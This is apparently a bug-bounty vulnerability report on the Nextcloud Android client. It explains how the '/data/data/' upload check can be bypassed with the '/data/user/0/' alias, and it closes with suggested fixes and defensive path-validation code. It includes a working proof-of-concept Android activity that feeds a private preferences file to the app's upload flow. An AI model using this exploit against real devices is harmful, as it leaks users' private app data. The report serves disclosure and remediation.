The Android client of Nextcloud (com.nextcloud.client) allows arbitrary files, including protected/private files, to be leaked through the file upload functionality.
Report 1142918 was previously submitted for the vulnerability of leaking arbitrary protected files. Nextcloud added a fix on May 18, 2021, which added a check in the class src/main/java/com/owncloud/android/files/services/FileUploader.java:
if (file.getStoragePath().startsWith("/data/data/")) {
    Log_OC.d(TAG, "Upload from sensitive path is not allowed");
    return;
}
The fix checks whether the path of a file to be uploaded starts with “/data/data”. However, the check is not sufficient: on Android, “/data/user/0/” refers to the same app-private directory as “/data/data/”, so the check is easily bypassed with a path such as “/data/user/0/com.nextcloud.client/”. A program exploiting this vulnerability can be:
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import androidx.annotation.Nullable;
import androidx.appcompat.app.AppCompatActivity;

public class EvilActivity extends AppCompatActivity {
    private static final String LOG_TAG = EvilActivity.class.getName();
    // Private file inside the Nextcloud sandbox, addressed through the /data/user/0/ alias
    // that the "/data/data/" prefix check does not cover.
    final static String PRIVATE_URI = "file:///data/user/0/com.nextcloud.client/shared_prefs/com.nextcloud.client_preferences.xml";

    @Override
    protected void onCreate(@Nullable Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Log.d("heen", "EvilActivity started!");
        // Return the private file to the calling upload flow as the picked result.
        setResult(-1, new Intent().setData(Uri.parse(PRIVATE_URI)));
        finish();
    }
}
A working POC is as follows:
Sample screenshots of the uploaded protected files and their content:
{F1523976}
{F1523979}
Arbitrary sensitive files of the Nextcloud Android client can be leaked. To address this issue, disallow uploading any file whose path contains the package name unless it is in Nextcloud's temp or cache folder.
Please investigate. Thanks.
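As an added illustration of the suggested fix (example code, not the report's or Nextcloud's own), the following Java helper decides by resolved location rather than by string prefix. The package name, the hard-coded roots and the /cache staging folder are assumptions for the demo; in the app they would come from Context.getDataDir() and Context.getCacheDir().

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Arrays;
import java.util.List;

public final class UploadPathPolicy {
    private static final String PKG = "com.nextcloud.client";
    // App-private roots; both spellings name the same directory on a device. In the
    // app these would come from Context.getDataDir() instead of being hard-coded.
    static final List<File> PRIVATE_ROOTS = Arrays.asList(
            new File("/data/data/" + PKG), new File("/data/user/0/" + PKG));
    // The only sandbox subfolders an upload may legitimately be staged from
    // (Context.getCacheDir() in the app; constructed here for the demo).
    static final List<File> STAGING_DIRS = Arrays.asList(
            new File("/data/data/" + PKG + "/cache"), new File("/data/user/0/" + PKG + "/cache"));
    // Normalise "." and ".." lexically, then resolve symlinks when the path exists,
    // so the decision is made on the real location rather than on its spelling.
    private static Path resolve(File f) throws IOException {
        Path p = f.toPath().toAbsolutePath().normalize();
        return Files.exists(p) ? p.toRealPath() : p;
    }
    // Component-wise prefix test: Path.startsWith, unlike String.startsWith, is not
    // fooled by a sibling directory whose name merely begins with the root's name.
    private static boolean isInside(File candidate, File root) throws IOException {
        return resolve(candidate).startsWith(resolve(root));
    }
    public static boolean isUploadAllowed(String storagePath) throws IOException {
        File file = new File(storagePath);
        for (File staging : STAGING_DIRS) {
            if (isInside(file, staging)) return true;   // legitimate staging area
        }
        for (File root : PRIVATE_ROOTS) {
            if (isInside(file, root)) return false;     // anything else in the sandbox
        }
        return true;                                    // ordinary user storage
    }
    public static void main(String[] args) throws IOException {
        String prefs = "/shared_prefs/" + PKG + "_preferences.xml";
        String[] samples = {
            "/data/user/0/" + PKG + prefs,            // the reported bypass: deny
            "/data/user/0/" + PKG + "/cache/up.tmp",  // staging folder: allow
            "/storage/emulated/0/DCIM/photo.jpg"      // user file: allow
        };
        for (String p : samples) {
            System.out.println((isUploadAllowed(p) ? "allow " : "deny  ") + p);
        }
    }
}
```

Because the check runs on the resolved path, it covers both spellings of the sandbox directory with one rule, and the allow-list keeps the cache folder usable for legitimate uploads.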